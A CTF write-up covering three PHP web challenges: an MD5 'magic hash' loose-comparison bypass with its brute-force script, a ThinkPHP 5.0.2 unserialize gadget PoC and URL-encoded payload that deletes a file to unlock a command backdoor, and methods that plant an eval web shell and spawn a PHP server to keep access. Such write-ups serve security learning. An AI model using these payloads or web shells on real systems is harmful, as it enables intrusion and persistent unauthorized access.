CTF 月饼杯 (Mooncake Cup) writeup

admin, October 9, 2021, 17:37:00

Web sign-in

<?php
//Author:H3h3QAQ
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET["YBB"])) {
    if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) {
        echo "小伙子不错嘛!!flag给你了:" . $flag;
    } else {
        echo "偶吼,带黑阔被窝抓到了!!!!";
    }
}
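
The loose comparison == treats two strings of the form 0e<digits> as numbers in scientific notation, so both sides evaluate to 0 and compare equal. The script below brute-forces a string of that form whose MD5 hash also has that form:

<?php
// Search for a string "0e<digits>" whose MD5 hash is also "0e<digits>"
for ($i = 0; $i < 10000000000000; $i++) {
    $str = '0e' . (string)$i;
    if (hash("md5", $str) == $str) {
        echo $str;
        break;
    }
}

Result:

0e215962017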
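
The flaw in the check above next to its fix, as an added example that is not part of the original writeup or the challenge author's code: the challenge's == comparison beside hash_equals(), run over constructed sample inputs plus the value 0e215962017 from this page. The function names are hypothetical.

```php
<?php
// Added example (not the challenge author's code). Function names are hypothetical.

// The challenge's check: == compares two numeric-looking strings as numbers,
// so an input and a hash that both read as "0e<digits>" evaluate to 0 and match.
function loose_check(string $input): bool
{
    return hash("md5", $input) == $input;
}

// Hardened check: hash_equals() compares the raw bytes (in constant time),
// with no numeric conversion.
function strict_check(string $input): bool
{
    return hash_equals(hash("md5", $input), $input);
}

// True when PHP would read the string as zero in scientific notation,
// i.e. the shape that makes loose comparison unsafe.
function looks_like_zero_exponent(string $s): bool
{
    return preg_match('/^0+e\d+$/i', $s) === 1;
}

// Constructed inputs; the first is the value printed by the brute-force script.
$samples = ["0e215962017", "admin", "0e1"];

foreach ($samples as $s) {
    $h = hash("md5", $s);
    printf(
        "%-12s md5=%s zero-exp(input/hash)=%s/%s loose=%s strict=%s\n",
        $s,
        $h,
        var_export(looks_like_zero_exponent($s), true),
        var_export(looks_like_zero_exponent($h), true),
        var_export(loose_check($s), true),
        var_export(strict_check($s), true)
    );
}
```

The same rule applies to any hash or token comparison in PHP: use === or hash_equals(), never ==.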

eztp

<?php
namespace app\index\controller;

class Index
{
    public function index($run = [])
    {
        highlight_file(__FILE__);
        echo '<h1>Welcome to CTFSHOW</h1></br>';
        echo 'Powered by PHPthink5.0.2</br>';
        echo dirname(__FILE__);

        if (!empty($run[2])) {
            // Base64 for "flag is not here but it is in flag.txt"
            echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';
        }
        if (!empty($run[1])) {
            // Request data is passed straight to unserialize()
            unserialize($run[1]);
        }
    }

    // hint:/index/index/backdoor
    public function backdoor()
    {
        if (!file_exists(dirname(__FILE__) . '/../../' . "install.lock")) {
            echo "Try to post CMD arguments" . '<br/>';
            $data = input('post.');
            if (!preg_match('/flag/i', $data['cmd'])) {
                $cmd = escapeshellarg($data['cmd']);
                $cmd = 'cat ' . $cmd;
                echo $cmd;
                system($cmd);
            } else {
                echo "No No No";
            }
        } else {
            echo dirname(__FILE__) . '/../../' . "install.lock has not been deleted";
        }
    }
}

Visit: ?s=/index/index/backdoor

/var/www/html/application/index/controller/../../install.lock has not been deleted

Arbitrary file deletion PoC

<?php
namespace think\process\pipes;

class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files = ['/var/www/html/application/install.lock'];
    }
}

echo urlencode(serialize(new Windows()));

payload

?run[]=1&run[]=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Finstall.lock%22%3B%7D%7D
?s=/index/index/backdoor
cmd=/fl%81ag

Don't leave me (不要离开我)

<?php

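// Challenge description:
// Find a way to maintain access. Once you are sure it works, submit check.
// The flag is only generated after check passes; before that the flag does not exist.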

error_reporting(0);
highlight_file(__FILE__);

$a=$_GET['action'];

switch($a){
    case 'cmd':
        eval($_POST['cmd']);
        break;
    case 'check':
        file_get_contents("http://checker/api/check");
        break;
    default:
        die('params not validate');
}

  • No write permission in the current directory (/var/www/html)
  • After check, nginx and php-fpm are shut down and the web directory (/var/www/html) is emptied

Method 1

get:/action=cmd

post:cmd=file_put_contents("/tmp/index.php","<?php eval($_POST[1]);?>");system("sleep 5 %26%26 php -S 0.0.0.0:80 -t /tmp/");

get:/action=check

Method 2

get:/action=cmd

post:cmd=system('sleep 5 %26%26 php -S 0.0.0.0:80 -t /');

get:/action=check

get:/flag_ssk.txt

Method 3

cmd=system('curl http://checker/api/check;cp /f* /tmp/flag;php -S 0.0.0.0:80 -t /tmp/');

When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work): CTF 月饼杯 writeup http://cn-sec.com/archives/574987.html